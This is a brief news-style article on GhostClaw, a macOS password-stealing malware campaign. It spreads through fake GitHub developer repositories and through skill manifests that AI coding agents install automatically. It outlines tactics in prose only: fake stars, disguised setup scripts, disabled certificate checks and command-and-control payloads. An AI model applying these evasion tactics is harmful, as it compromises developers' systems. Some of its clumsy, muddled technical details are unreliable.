GhostClaw Malware Powered by AI Hits macOS and Steals Passwords

GhostClaw or Ghost loader is a growing malware campaign for macOS This article explores ghostclaw sneaky threat. . The infection follows a multi-step process that is meant to get access to and steal macOS credentials.

Attackers use repositories that have certain manifest files that are made for platforms where AI coding agents can automatically find and install external skills. GhostClaw is a very sneaky threat to developer environments because it uses both anti-forensic techniques and native macOS tools in a bad way. The main part of the program is a setup script that is meant to trick victims. The malware deletes its temporary files to make sure it stays around for a long time.

It moves to hidden folders that look like normal developer activity. After the installation is done, a script runs to clear the terminal of any signs of the attack. It installs global packages to make it even more like normal system operations.

The threat has now grown. Threat actors are actively using malicious GitHub repositories to spread the malware, which makes the attack surface bigger by including developers and automated AI workflows. These repositories pretend to be real developer tools, trading bots, and software development kits.

Attackers build trust by filling the repositories with harmless code and getting fake engagement, like hundreds of repository stars. They then quietly add malicious code. This lets the attacker get into systems through both direct user interaction and automated AI agent workflows, which completely get around the usual package manager protections. It turns off certificate verification during the download by using an insecure flag, which makes transport security weaker.

Execution then moves on to JavaScript payloads that are very hard to read.

The malware successfully checks the stolen credentials and then connects to a remote command-and-control server to get a jamf-encrypted secondary payload.